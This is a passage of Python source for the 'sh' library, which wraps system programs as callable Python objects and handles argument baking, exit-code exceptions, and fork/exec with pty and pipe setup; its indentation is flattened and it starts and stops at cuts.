from types import ModuleType
from functools import partial
import inspect
from contextlib import contextmanager
from locale import getpreferredencoding
DEFAULT_ENCODING = getpreferredencoding() or "UTF-8"
if IS_PY3:
from io import StringIO
from io import BytesIO as cStringIO
from queue import Queue, Empty
# for some reason, python 3.1 removed the builtin "callable", wtf
if not hasattr(__builtins__, "callable"):
def callable(ob):
return hasattr(ob, "__call__")
else:
from StringIO import StringIO
from cStringIO import OutputType as cStringIO
from Queue import Queue, Empty
IS_OSX = platform.system() == "Darwin"
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
SH_LOGGER_NAME = "sh"
import errno
import warnings
import pty
import termios
import signal
import gc
import select
import threading
import tty
import fcntl
import struct
import resource
from collections import deque
import logging
import weakref
# TODO remove with contexts in next version
def with_context_warning():
warnings.warn("""
with contexts are deprecated because they are not thread safe. they will be \
removed in the next version. use subcommands instead \
http://amoffat.github.io/sh/#sub-commands. see \
https://github.com/amoffat/sh/issues/195
""".strip(), stacklevel=3)
if IS_PY3:
raw_input = input
unicode = str
basestring = str
_unicode_methods = set(dir(unicode()))
def encode_to_py3bytes_or_py2str(s):
""" takes anything and attempts to return a py2 string or py3 bytes. this
is typically used when creating command + arguments to be executed via
os.exec* """
fallback_encoding = "utf8"
if IS_PY3:
# if we're already bytes, do nothing
if isinstance(s, bytes):
pass
else:
s = str(s)
try:
s = bytes(s, DEFAULT_ENCODING)
except UnicodeEncodeError:
s = bytes(s, fallback_encoding)
else:
# attempt to convert the thing to unicode from the system's encoding
try:
s = unicode(s, DEFAULT_ENCODING)
# if the thing is already unicode, or it's a number, it can't be
# coerced to unicode with an encoding argument, but if we leave out
# the encoding argument, it will convert it to a string, then to unicode
except TypeError:
s = unicode(s)
# now that we have guaranteed unicode, encode to our system encoding,
# but attempt to fall back to something
try:
s = s.encode(DEFAULT_ENCODING)
except:
s = s.encode(fallback_encoding)
return s
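# Editor's sketch (not part of sh): expected behavior of the helper above,
# assuming an ASCII-compatible default encoding such as UTF-8.
def _encode_to_py3bytes_or_py2str_example():
    out = encode_to_py3bytes_or_py2str("ls")
    assert out == (b"ls" if IS_PY3 else "ls")   # py3 bytes, py2 str
    # non-strings are stringified first, then encoded
    assert encode_to_py3bytes_or_py2str(42) == (b"42" if IS_PY3 else "42")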
class ErrorReturnCode(Exception):
""" base class for all exceptions as a result of a command's exit status
being deemed an error. this base class is dynamically subclassed into
derived classes with the format: ErrorReturnCode_NNN where NNN is the exit
    code number. the reason for this is it reduces boilerplate code when
testing error return codes:
try:
some_cmd()
except ErrorReturnCode_12:
print("couldn't do X")
vs:
try:
some_cmd()
except ErrorReturnCode as e:
if e.exit_code == 12:
print("couldn't do X")
it's not much of a savings, but i believe it makes the code easier to read """
truncate_cap = 750
def __init__(self, full_cmd, stdout, stderr):
self.full_cmd = full_cmd
self.stdout = stdout
self.stderr = stderr
if self.stdout is None:
exc_stdout = "<redirected>"
else:
exc_stdout = self.stdout[:self.truncate_cap]
out_delta = len(self.stdout) - len(exc_stdout)
if out_delta:
exc_stdout += ("... (%d more, please see e.stdout)" % out_delta).encode()
if self.stderr is None:
exc_stderr = "<redirected>"
else:
exc_stderr = self.stderr[:self.truncate_cap]
err_delta = len(self.stderr) - len(exc_stderr)
if err_delta:
exc_stderr += ("... (%d more, please see e.stderr)" % err_delta).encode()
msg = "\n\n RAN: %r\n\n STDOUT:\n%s\n\n STDERR:\n%s" % \
(full_cmd, exc_stdout.decode(DEFAULT_ENCODING, "replace"),
exc_stderr.decode(DEFAULT_ENCODING, "replace"))
super(ErrorReturnCode, self).__init__(msg)
class SignalException(ErrorReturnCode): pass
class TimeoutException(Exception):
""" the exception thrown when a command is killed because a specified
timeout (via _timeout) was hit """
def __init__(self, exit_code):
self.exit_code = exit_code
super(Exception, self).__init__()
SIGNALS_THAT_SHOULD_THROW_EXCEPTION = (
signal.SIGABRT,
signal.SIGBUS,
signal.SIGFPE,
signal.SIGILL,
signal.SIGINT,
signal.SIGKILL,
signal.SIGPIPE,
signal.SIGQUIT,
signal.SIGSEGV,
signal.SIGTERM,
signal.SIGSYS,
)
# we subclass AttributeError because:
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
class CommandNotFound(AttributeError): pass
rc_exc_regex = re.compile(r"(ErrorReturnCode|SignalException)_((\d+)|SIG\w+)")
rc_exc_cache = {}
def get_exc_from_name(name):
""" takes an exception name, like:
ErrorReturnCode_1
SignalException_9
SignalException_SIGHUP
and returns the corresponding exception. this is primarily used for
importing exceptions from sh into user code, for instance, to capture those
exceptions """
exc = None
try:
return rc_exc_cache[name]
except KeyError:
m = rc_exc_regex.match(name)
if m:
base = m.group(1)
rc_or_sig_name = m.group(2)
if base == "SignalException":
try:
rc = -int(rc_or_sig_name)
except ValueError:
rc = -getattr(signal, rc_or_sig_name)
else:
rc = int(rc_or_sig_name)
exc = get_rc_exc(rc)
return exc
def get_rc_exc(rc_or_sig_name):
""" takes a exit code, signal number, or signal name, and produces an
exception that corresponds to that return code. positive return codes yield
ErrorReturnCode exception, negative return codes yield SignalException
we also cache the generated exception so that only one signal of that type
exists, preserving identity """
try:
rc = int(rc_or_sig_name)
except ValueError:
rc = -getattr(signal, rc_or_sig_name)
try:
return rc_exc_cache[rc]
except KeyError:
pass
if rc > 0:
name = "ErrorReturnCode_%d" % rc
base = ErrorReturnCode
else:
name = "SignalException_%d" % abs(rc)
base = SignalException
exc = type(name, (base,), {"exit_code": rc})
rc_exc_cache[rc] = exc
return exc
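# Editor's sketch (not part of sh): demonstrates the dynamically-created
# exception classes and the identity-preserving cache described above.
def _get_rc_exc_example():
    exc = get_rc_exc(12)
    assert exc.__name__ == "ErrorReturnCode_12"
    assert get_rc_exc(12) is exc                 # cached: same class object
    sig = get_rc_exc("SIGHUP")                   # name -> SignalException_1
    assert issubclass(sig, SignalException)
    assert sig.exit_code == -signal.SIGHUP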
def which(program):
def is_exe(fpath):
return (os.path.exists(fpath) and
os.access(fpath, os.X_OK) and
os.path.isfile(os.path.realpath(fpath)))
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
if "PATH" not in os.environ:
return None
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def resolve_program(program):
path = which(program)
if not path:
# our actual command might have a dash in it, but we can't call
# that from python (we have to use underscores), so we'll check
# if a dash version of our underscore command exists and use that
# if it does
if "_" in program:
path = which(program.replace("_", "-"))
if not path:
return None
return path
# we add this thin wrapper to glob.glob because of a specific edge case where
# glob does not expand to anything. for example, if you try to do
# glob.glob("*.py") and there are no *.py files in the directory, glob.glob
# returns an empty list. this empty list gets passed to the command, and
# then the command fails with a misleading error message. this thin wrapper
# ensures that if there is no expansion, we pass in the original argument,
# so that when the command fails, the error message is clearer
def glob(arg):
return original_glob(arg) or arg
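# Editor's note (hedged example): with no *.py files in the cwd,
#   original_glob("*.py")  ->  []       (argument silently vanishes)
#   glob("*.py")           ->  "*.py"   (command sees the literal pattern and
#                                        can report a sensible error)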
class Logger(object):
""" provides a memory-inexpensive logger. a gotcha about python's builtin
logger is that logger objects are never garbage collected. if you create a
thousand loggers with unique names, they'll sit there in memory until your
script is done. with sh, it's easy to create loggers with unique names if
we want our loggers to include our command arguments. for example, these
are all unique loggers:
ls -l
ls -l /tmp
ls /tmp
so instead of creating unique loggers, and without sacrificing logging
output, we use this class, which maintains as part of its state, the logging
"context", which will be the very unique name. this allows us to get a
logger with a very general name, eg: "command", and have a unique name
appended to it via the context, eg: "ls -l /tmp" """
def __init__(self, name, context=None):
self.name = name
if context:
context = context.replace("%", "%%")
self.context = context
self.log = logging.getLogger("%s.%s" % (SH_LOGGER_NAME, name))
def _format_msg(self, msg, *args):
if self.context:
msg = "%s: %s" % (self.context, msg)
return msg % args
def get_child(self, name, context):
new_name = self.name + "." + name
new_context = self.context + "." + context
l = Logger(new_name, new_context)
return l
def info(self, msg, *args):
self.log.info(self._format_msg(msg, *args))
def debug(self, msg, *args):
self.log.debug(self._format_msg(msg, *args))
def error(self, msg, *args):
self.log.error(self._format_msg(msg, *args))
def exception(self, msg, *args):
self.log.exception(self._format_msg(msg, *args))
def friendly_truncate(s, max_len):
if len(s) > max_len:
s = "%s...(%d more)" % (s[:max_len], len(s) - max_len)
return s
class RunningCommand(object):
""" this represents an executing Command object. it is returned as the
result of __call__() being executed on a Command instance. this creates a
    reference to an OProc instance, which is a low-level wrapper around the
process that was exec'd
this is the class that gets manipulated the most by user code, and so it
implements various convenience methods and logical mechanisms for the
underlying process. for example, if a user tries to access a
backgrounded-process's stdout/err, the RunningCommand object is smart enough
to know to wait() on the process to finish first. and when the process
finishes, RunningCommand is smart enough to translate exit codes to
exceptions. """
def __init__(self, cmd, call_args, stdin, stdout, stderr):
# self.ran is used for auditing what actually ran. for example, in
        # exceptions, or if you just want to know what was run after the
# command ran
if IS_PY3:
self.ran = " ".join([arg.decode(DEFAULT_ENCODING, "ignore") for arg in cmd])
else:
self.ran = " ".join(cmd)
friendly_cmd = friendly_truncate(self.ran, 20)
friendly_call_args = friendly_truncate(str(call_args), 20)
# we're setting up the logger string here, instead of __repr__ because
# we reserve __repr__ to behave as if it was evaluating the child
# process's output
logger_str = "<Command %r call_args %s>" % (friendly_cmd,
friendly_call_args)
self.log = Logger("command", logger_str)
self.call_args = call_args
self.cmd = cmd
self.process = None
self._process_completed = False
should_wait = True
spawn_process = True
# with contexts shouldn't run at all yet, they prepend
# to every command in the context
if call_args["with"]:
spawn_process = False
Command._prepend_stack.append(self)
if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]:
should_wait = False
# we're running in the background, return self and let us lazily
# evaluate
if call_args["bg"]:
should_wait = False
# redirection
if call_args["err_to_out"]:
stderr = OProc.STDOUT
# set up which stream should write to the pipe
# TODO, make pipe None by default and limit the size of the Queue
# in oproc.OProc
pipe = OProc.STDOUT
if call_args["iter"] == "out" or call_args["iter"] is True:
pipe = OProc.STDOUT
elif call_args["iter"] == "err":
pipe = OProc.STDERR
if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True:
pipe = OProc.STDOUT
elif call_args["iter_noblock"] == "err":
pipe = OProc.STDERR
# there's currently only one case where we wouldn't spawn a child
# process, and that's if we're using a with-context with our command
if spawn_process:
self.log.info("starting process")
self.process = OProc(self.log, cmd, stdin, stdout, stderr,
self.call_args, pipe)
if should_wait:
self.wait()
def wait(self):
if not self._process_completed:
self._process_completed = True
exit_code = self.process.wait()
if self.process.timed_out:
# if we timed out, our exit code represents a signal, which is
# negative, so let's make it positive to store in our
# TimeoutException
raise TimeoutException(-exit_code)
else:
self.handle_command_exit_code(exit_code)
# https://github.com/amoffat/sh/issues/185
if self.call_args["done"]:
self.call_args["done"](self)
return self
def handle_command_exit_code(self, code):
""" here we determine if we had an exception, or an error code that we
weren't expecting to see. if we did, we create and raise an exception
"""
if (code not in self.call_args["ok_code"] and (code > 0 or -code in
SIGNALS_THAT_SHOULD_THROW_EXCEPTION)):
exc = get_rc_exc(code)
raise exc(self.ran, self.process.stdout, self.process.stderr)
@property
def stdout(self):
self.wait()
return self.process.stdout
@property
def stderr(self):
self.wait()
return self.process.stderr
@property
def exit_code(self):
self.wait()
return self.process.exit_code
@property
def pid(self):
return self.process.pid
def __len__(self):
return len(str(self))
def __enter__(self):
""" we don't actually do anything here because anything that should have
been done would have been done in the Command.__call__ call.
        essentially all that has to happen is that the command be pushed on the
prepend stack. """
with_context_warning()
def __iter__(self):
return self
def next(self):
""" allow us to iterate over the output of our command """
# we do this because if get blocks, we can't catch a KeyboardInterrupt
# so the slight timeout allows for that.
while True:
try:
chunk = self.process._pipe_queue.get(True, 0.001)
except Empty:
if self.call_args["iter_noblock"]:
return errno.EWOULDBLOCK
else:
if chunk is None:
self.wait()
raise StopIteration()
try:
return chunk.decode(self.call_args["encoding"],
self.call_args["decode_errors"])
except UnicodeDecodeError:
return chunk
# python 3
__next__ = next
def __exit__(self, typ, value, traceback):
if self.call_args["with"] and Command._prepend_stack:
Command._prepend_stack.pop()
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return unicode(self).encode(self.call_args["encoding"])
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
RunningCommand object will call this """
if self.process and self.stdout:
return self.stdout.decode(self.call_args["encoding"],
self.call_args["decode_errors"])
elif IS_PY3:
return ""
else:
return unicode("")
def __eq__(self, other):
return unicode(self) == unicode(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __contains__(self, item):
return item in str(self)
def __getattr__(self, p):
# let these three attributes pass through to the OProc object
if p in ("signal", "terminate", "kill"):
if self.process:
return getattr(self.process, p)
else:
raise AttributeError
# see if strings have what we're looking for. we're looking at the
# method names explicitly because we don't want to evaluate self unless
# we absolutely have to, the reason being, in python2, hasattr swallows
# exceptions, and if we try to run hasattr on a command that failed and
# is being run with _iter=True, the command will be evaluated, throw an
# exception, but hasattr will discard it
if p in _unicode_methods:
return getattr(unicode(self), p)
raise AttributeError
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
try:
return str(self)
except UnicodeDecodeError:
if self.process:
if self.stdout:
return repr(self.stdout)
return repr("")
def __long__(self):
return long(str(self).strip())
def __float__(self):
return float(str(self).strip())
def __int__(self):
return int(str(self).strip())
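# Editor's sketch of the conveniences above (hedged; assumes `import sh` and
# a `wc` binary on PATH, purely illustrative):
#
#   out = sh.wc("-l", _in="a\nb\n")   # returns a RunningCommand
#   str(out)                          # decoded stdout, here "2\n"
#   int(out)                          # __int__ strips/parses stdout -> 2
#   out.exit_code                     # waits, then returns the exit code
#   "2" in out                        # __contains__ tests against str(out)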
def output_redirect_is_filename(out):
return out \
and not callable(out) \
and not hasattr(out, "write") \
and not isinstance(out, (cStringIO, StringIO))
class Command(object):
""" represents an un-run system program, like "ls" or "cd". because it
represents the program itself (and not a running instance of it), it should
hold very little state. in fact, the only state it does hold is baked
arguments.
when a Command object is called, the result that is returned is a
RunningCommand object, which represents the Command put into an execution
state. """
_prepend_stack = []
_call_args = {
# currently unsupported
#"fg": False, # run command in foreground
# run a command in the background. commands run in the background
# ignore SIGHUP and do not automatically exit when the parent process
# ends
"bg": False,
"with": False, # prepend the command to every command after it
"in": None,
"out": None, # redirect STDOUT
"err": None, # redirect STDERR
"err_to_out": None, # redirect STDERR to STDOUT
# stdin buffer size
# 1 for line, 0 for unbuffered, any other number for that amount
"in_bufsize": 0,
# stdout buffer size, same values as above
"out_bufsize": 1,
"err_bufsize": 1,
# this is how big the output buffers will be for stdout and stderr.
# this is essentially how much output they will store from the process.
# we use a deque, so if it overflows past this amount, the first items
# get pushed off as each new item gets added.
#
# NOTICE
# this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if
# you're buffering out/err at 1024 bytes, the internal buffer size will
# be "internal_bufsize" CHUNKS of 1024 bytes
"internal_bufsize": 3 * 1024 ** 2,
"env": None,
"piped": None,
"iter": None,
"iter_noblock": None,
"ok_code": 0,
"cwd": None,
# the separator delimiting between a long-argument's name and its value
# for example, --arg=derp, '=' is the long_sep
"long_sep": "=",
# this is for programs that expect their input to be from a terminal.
# ssh is one of those programs
"tty_in": False,
"tty_out": True,
"encoding": DEFAULT_ENCODING,
"decode_errors": "strict",
# how long the process should run before it is auto-killed
"timeout": 0,
"timeout_signal": signal.SIGKILL,
# TODO write some docs on "long-running processes"
# these control whether or not stdout/err will get aggregated together
# as the process runs. this has memory usage implications, so sometimes
# with long-running processes with a lot of data, it makes sense to
# set these to true
"no_out": False,
"no_err": False,
"no_pipe": False,
# if any redirection is used for stdout or stderr, internal buffering
# of that data is not stored. this forces it to be stored, as if
# the output is being T'd to both the redirected destination and our
# internal buffers
"tee": None,
# will be called when a process terminates without exception. this
# option also puts the command in the background, since it doesn't make
# sense to have an un-backgrounded command with a done callback
"done": None,
# a tuple (rows, columns) of the desired size of both the stdout and
# stdin ttys, if ttys are being used
"tty_size": (20, 80),
}
# these are arguments that cannot be called together, because they wouldn't
# make any sense
_incompatible_call_args = (
#("fg", "bg", "Command can't be run in the foreground and background"),
("err", "err_to_out", "Stderr is already being redirected"),
("piped", "iter", "You cannot iterate when this command is being piped"),
("piped", "no_pipe", "Using a pipe doesn't make sense if you've \
disabled the pipe"),
("no_out", "iter", "You cannot iterate over output if there is no \
output"),
)
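    # Editor's example (hedged, not from the source): combining such
    # arguments raises TypeError from _extract_call_args, e.g.
    #   sh.ls(_piped=True, _iter=True)
    #   TypeError: Invalid special arguments ['piped', 'iter']: You cannot
    #       iterate when this command is being piped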
# this method exists because of the need to have some way of letting
# manual object instantiation not perform the underscore-to-dash command
# conversion that resolve_program uses.
#
# there are 2 ways to create a Command object. using sh.Command(<program>)
# or by using sh.<program>. the method fed into sh.Command must be taken
# literally, and so no underscore-dash conversion is performed. the one
    # for sh.<program> must do the underscore-dash conversion, because we
# can't type dashes in method names
@classmethod
def _create(cls, program, **default_kwargs):
path = resolve_program(program)
if not path:
raise CommandNotFound(program)
cmd = cls(path)
if default_kwargs:
cmd = cmd.bake(**default_kwargs)
return cmd
def __init__(self, path):
found = which(path)
if not found:
raise CommandNotFound(path)
self._path = encode_to_py3bytes_or_py2str(found)
self._partial = False
self._partial_baked_args = []
self._partial_call_args = {}
# bugfix for functools.wraps. issue #121
self.__name__ = str(self)
def __getattribute__(self, name):
# convenience
getattr = partial(object.__getattribute__, self)
if name.startswith("_"):
return getattr(name)
if name == "bake":
return getattr("bake")
if name.endswith("_"):
name = name[:-1]
return getattr("bake")(name)
@staticmethod
def _extract_call_args(kwargs, to_override={}):
kwargs = kwargs.copy()
call_args = {}
for parg, default in Command._call_args.items():
key = "_" + parg
if key in kwargs:
call_args[parg] = kwargs[key]
del kwargs[key]
elif parg in to_override:
call_args[parg] = to_override[parg]
# test for incompatible call args
s1 = set(call_args.keys())
for args in Command._incompatible_call_args:
args = list(args)
error = args.pop()
if s1.issuperset(args):
raise TypeError("Invalid special arguments %r: %s" % (args, error))
return call_args, kwargs
def _aggregate_keywords(self, keywords, sep, raw=False):
processed = []
for k, v in keywords.items():
# we're passing a short arg as a kwarg, example:
# cut(d="\t")
if len(k) == 1:
if v is not False:
processed.append(encode_to_py3bytes_or_py2str("-" + k))
if v is not True:
processed.append(encode_to_py3bytes_or_py2str(v))
# we're doing a long arg
else:
if not raw:
k = k.replace("_", "-")
if v is True:
processed.append(encode_to_py3bytes_or_py2str("--" + k))
elif v is False:
pass
else:
arg = encode_to_py3bytes_or_py2str("--%s%s%s" % (k, sep, v))
processed.append(arg)
return processed
def _compile_args(self, args, kwargs, sep):
processed_args = []
# aggregate positional args
for arg in args:
if isinstance(arg, (list, tuple)):
if not arg:
warnings.warn("Empty list passed as an argument to %r. \
If you're using glob.glob(), please use sh.glob() instead." % self._path, stacklevel=3)
for sub_arg in arg:
processed_args.append(encode_to_py3bytes_or_py2str(sub_arg))
elif isinstance(arg, dict):
processed_args += self._aggregate_keywords(arg, sep, raw=True)
else:
processed_args.append(encode_to_py3bytes_or_py2str(arg))
# aggregate the keyword arguments
processed_args += self._aggregate_keywords(kwargs, sep)
return processed_args
# TODO needs documentation
def bake(self, *args, **kwargs):
fn = Command(self._path)
fn._partial = True
call_args, kwargs = self._extract_call_args(kwargs)
pruned_call_args = call_args
for k, v in Command._call_args.items():
try:
if pruned_call_args[k] == v:
del pruned_call_args[k]
except KeyError:
continue
fn._partial_call_args.update(self._partial_call_args)
fn._partial_call_args.update(pruned_call_args)
fn._partial_baked_args.extend(self._partial_baked_args)
sep = pruned_call_args.get("long_sep", self._call_args["long_sep"])
fn._partial_baked_args.extend(self._compile_args(args, kwargs, sep))
return fn
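    # Editor's sketch for the undocumented bake() above (hedged; `sh.ls` and
    # `sh.ssh` are illustrative):
    #   ls = sh.ls.bake("-la")            # bakes positional args
    #   ls("/tmp")                        # runs: ls -la /tmp
    #   server = sh.ssh.bake("myserver", p=1393)
    #   server("whoami")                  # runs: ssh myserver -p 1393 whoami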
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return self.__unicode__().encode(DEFAULT_ENCODING)
def __eq__(self, other):
try:
return str(self) == str(other)
except:
return False
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
return "<Command %r>" % str(self)
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
self will call this """
baked_args = " ".join(item.decode(DEFAULT_ENCODING) for item in self._partial_baked_args)
if baked_args:
baked_args = " " + baked_args
return self._path.decode(DEFAULT_ENCODING) + baked_args
def __enter__(self):
with_context_warning()
self(_with=True)
def __exit__(self, typ, value, traceback):
Command._prepend_stack.pop()
def __call__(self, *args, **kwargs):
kwargs = kwargs.copy()
args = list(args)
cmd = []
# aggregate any 'with' contexts
call_args = Command._call_args.copy()
for prepend in self._prepend_stack:
# don't pass the 'with' call arg
pcall_args = prepend.call_args.copy()
try:
del pcall_args["with"]
except:
pass
call_args.update(pcall_args)
cmd.extend(prepend.cmd)
cmd.append(self._path)
# here we extract the special kwargs and override any
# special kwargs from the possibly baked command
tmp_call_args, kwargs = self._extract_call_args(kwargs, self._partial_call_args)
call_args.update(tmp_call_args)
if not getattr(call_args["ok_code"], "__iter__", None):
call_args["ok_code"] = [call_args["ok_code"]]
if call_args["done"]:
call_args["bg"] = True
# check if we're piping via composition
stdin = call_args["in"]
if args:
first_arg = args.pop(0)
if isinstance(first_arg, RunningCommand):
# it makes sense that if the input pipe of a command is running
# in the background, then this command should run in the
# background as well
if first_arg.call_args["bg"]:
call_args["bg"] = True
if first_arg.call_args["piped"] == "direct":
stdin = first_arg.process
else:
stdin = first_arg.process._pipe_queue
else:
args.insert(0, first_arg)
processed_args = self._compile_args(args, kwargs, call_args["long_sep"])
# makes sure our arguments are broken up correctly
split_args = self._partial_baked_args + processed_args
final_args = split_args
cmd.extend(final_args)
# stdout redirection
stdout = call_args["out"]
if output_redirect_is_filename(stdout):
stdout = open(str(stdout), "wb")
# stderr redirection
stderr = call_args["err"]
if output_redirect_is_filename(stderr):
stderr = open(str(stderr), "wb")
return RunningCommand(cmd, call_args, stdin, stdout, stderr)
def _start_daemon_thread(fn, *args):
thrd = threading.Thread(target=fn, args=args)
thrd.daemon = True
thrd.start()
return thrd
def setwinsize(fd, rows_cols):
""" set the terminal size of a tty file descriptor. borrowed logic
from pexpect.py """
rows, cols = rows_cols
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, TIOCSWINSZ, s)
def construct_streamreader_callback(process, handler):
""" here we're constructing a closure for our streamreader callback. this
is used in the case that we pass a callback into _out or _err, meaning we
    want our callback to handle each bit of output
we construct the closure based on how many arguments it takes. the reason
for this is to make it as easy as possible for people to use, without
limiting them. a new user will assume the callback takes 1 argument (the
data). as they get more advanced, they may want to terminate the process,
or pass some stdin back, and will realize that they can pass a callback of
more args """
# implied arg refers to the "self" that methods will pass in. we need to
# account for this implied arg when figuring out what function the user
# passed in based on number of args
implied_arg = 0
partial_args = 0
handler_to_inspect = handler
if isinstance(handler, partial):
partial_args = len(handler.args)
handler_to_inspect = handler.func
if inspect.ismethod(handler_to_inspect):
implied_arg = 1
num_args = len(inspect.getargspec(handler_to_inspect).args)
else:
if inspect.isfunction(handler_to_inspect):
num_args = len(inspect.getargspec(handler_to_inspect).args)
# is an object instance with __call__ method
else:
implied_arg = 1
num_args = len(inspect.getargspec(handler_to_inspect.__call__).args)
net_args = num_args - implied_arg - partial_args
handler_args = ()
# just the chunk
if net_args == 1:
handler_args = ()
# chunk, stdin
if net_args == 2:
handler_args = (process.stdin,)
# chunk, stdin, process
elif net_args == 3:
# notice we're only storing a weakref, to prevent cyclic references
# (where the process holds a streamreader, and a streamreader holds a
        # handler-closure with a reference to the process)
handler_args = (process.stdin, weakref.ref(process))
def fn(chunk):
# this is pretty ugly, but we're evaluating the process at call-time,
# because it's a weakref
args = handler_args
if len(args) == 2:
args = (handler_args[0], handler_args[1]())
return handler(chunk, *args)
return fn
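# Editor's sketch (hedged): all three arities are accepted for an _out/_err
# handler; the closure above adapts the call accordingly:
#   def h1(chunk): ...                    # data only
#   def h2(chunk, stdin): ...             # may write back to the process
#   def h3(chunk, stdin, process): ...    # process arrives via weakref deref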
def handle_process_exit_code(exit_code):
""" this should only ever be called once for each child process """
# if we exited from a signal, let our exit code reflect that
if os.WIFSIGNALED(exit_code):
return -os.WTERMSIG(exit_code)
# otherwise just give us a normal exit code
elif os.WIFEXITED(exit_code):
return os.WEXITSTATUS(exit_code)
else:
raise RuntimeError("Unknown child exit status!")
class OProc(object):
""" this class is instantiated by RunningCommand for a command to be exec'd.
it handles all the nasty business involved with correctly setting up the
    input/output to the child process. it gets its name from subprocess.Popen
(process open) but we're calling ours OProc (open process) """
_default_window_size = (24, 80)
# used in redirecting
STDOUT = -1
STDERR = -2
def __init__(self, parent_log, cmd, stdin, stdout, stderr, call_args, pipe):
"""
cmd is the full string that will be exec'd. it includes the program
name and all its arguments
stdin, stdout, stderr are what the child will use for standard
input/output/err
call_args is a mapping of all the special keyword arguments to apply
to the child process
"""
self.call_args = call_args
# I had issues with getting 'Input/Output error reading stdin' from dd,
# until I set _tty_out=False
if self.call_args["piped"] == "direct":
self.call_args["tty_out"] = False
self._single_tty = self.call_args["tty_in"] and self.call_args["tty_out"]
# this logic is a little convoluted, but basically this top-level
# if/else is for consolidating input and output TTYs into a single
# TTY. this is the only way some secure programs like ssh will
        # output correctly (that is, if stdout and stdin are both the same TTY)
if self._single_tty:
self._stdin_fd, self._slave_stdin_fd = pty.openpty()
self._stdout_fd = self._stdin_fd
self._slave_stdout_fd = self._slave_stdin_fd
self._stderr_fd = self._stdin_fd
self._slave_stderr_fd = self._slave_stdin_fd
# do not consolidate stdin and stdout. this is the most common use-
# case
else:
# this check here is because we may be doing "direct" piping
# (_piped="direct"), and so our stdin might be an instance of
# OProc
if isinstance(stdin, OProc):
self._slave_stdin_fd = stdin._stdout_fd
self._stdin_fd = None
elif self.call_args["tty_in"]:
self._slave_stdin_fd, self._stdin_fd = pty.openpty()
# tty_in=False is the default
else:
self._slave_stdin_fd, self._stdin_fd = os.pipe()
# tty_out=True is the default
if self.call_args["tty_out"]:
self._stdout_fd, self._slave_stdout_fd = pty.openpty()
else:
self._stdout_fd, self._slave_stdout_fd = os.pipe()
# unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe,
# and never a PTY. the reason for this is not totally clear to me,
# but it has to do with the fact that if STDERR isn't set as the
# CTTY (because STDOUT is), the STDERR buffer won't always flush
# by the time the process exits, and the data will be lost.
# i've only seen this on OSX.
if stderr is not OProc.STDOUT:
self._stderr_fd, self._slave_stderr_fd = os.pipe()
# this is a hack, but what we're doing here is intentionally throwing an
        # OSError exception if our child process's directory doesn't exist,
# but we're doing it BEFORE we fork. the reason for before the fork is
# error handling. i'm currently too lazy to implement what
        # subprocess.py did and set up an error pipe to handle exceptions that
# happen in the child between fork and exec. it has only been seen in
# the wild for a missing cwd, so we'll handle it here.
cwd = self.call_args["cwd"]
if cwd is not None and not os.path.exists(cwd):
os.chdir(cwd)
gc_enabled = gc.isenabled()
if gc_enabled:
gc.disable()
self.pid = os.fork()
# child
if self.pid == 0: # pragma: no cover
try:
# ignoring SIGHUP lets us persist even after the parent process
# exits. only ignore if we're backgrounded
if self.call_args["bg"] is True:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
# this piece of ugliness is due to a bug where we can lose output
# if we do os.close(self._slave_stdout_fd) in the parent after
# the child starts writing.
# see http://bugs.python.org/issue15898
if IS_OSX:
time.sleep(0.01)
os.setsid()
if self.call_args["tty_out"]:
# set raw mode, so there isn't any weird translation of
# newlines to \r\n and other oddities. we're not outputting
# to a terminal anyways
#
# we HAVE to do this here, and not in the parent process,
# because we have to guarantee that this is set before the
# child process is run, and we can't do it twice.
tty.setraw(self._slave_stdout_fd)
# if the parent-side fd for stdin exists, close it. the case
# where it may not exist is if we're using piped="direct"
if self._stdin_fd:
os.close(self._stdin_fd)
if not self._single_tty:
os.close(self._stdout_fd)
if stderr is not OProc.STDOUT:
os.close(self._stderr_fd)
if cwd:
os.chdir(cwd)
os.dup2(self._slave_stdin_fd, 0)
os.dup2(self._slave_stdout_fd, 1)
# we're not directing stderr to stdout? then set self._slave_stderr_fd to
# fd 2, the common stderr fd
if stderr is OProc.STDOUT:
os.dup2(self._slave_stdout_fd, 2)
else:
os.dup2(self._slave_stderr_fd, 2)
# don't inherit file descriptors
max_fd = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
os.closerange(3, max_fd)
# set our controlling terminal. tty_out defaults to true
if self.call_args["tty_out"]:
tmp_fd = os.open(os.ttyname(1), os.O_RDWR)
os.close(tmp_fd)
if self.call_args["tty_out"]:
setwinsize(1, self.call_args["tty_size"])
# actually execute the process
if self.call_args["env"] is None:
os.execv(cmd[0], cmd)
else:
os.execve(cmd[0], cmd, self.call_args["env"])
# we must ensure that we ALWAYS exit the child process, otherwise
# the parent process code will be executed twice on exception
# https://github.com/amoffat/sh/issues/202
#
# if your parent process experiences an exit code 255, it is most
# likely that an exception occurred between the fork of the child
# and the exec. this should be reported.
finally:
os._exit(255)
# parent
else:
if gc_enabled:
gc.enable()
# used to determine what exception to raise. if our process was
# killed via a timeout counter, we'll raise something different than
# a SIGKILL exception
self.timed_out = False
self.started = time.time()
self.cmd = cmd
# exit code should only be manipulated from within self._wait_lock
# to prevent race conditions
self.exit_code = None
self.stdin = stdin or Queue()
# _pipe_queue is used internally to hand off stdout from one process
# to another. by default, all stdout from a process gets dumped
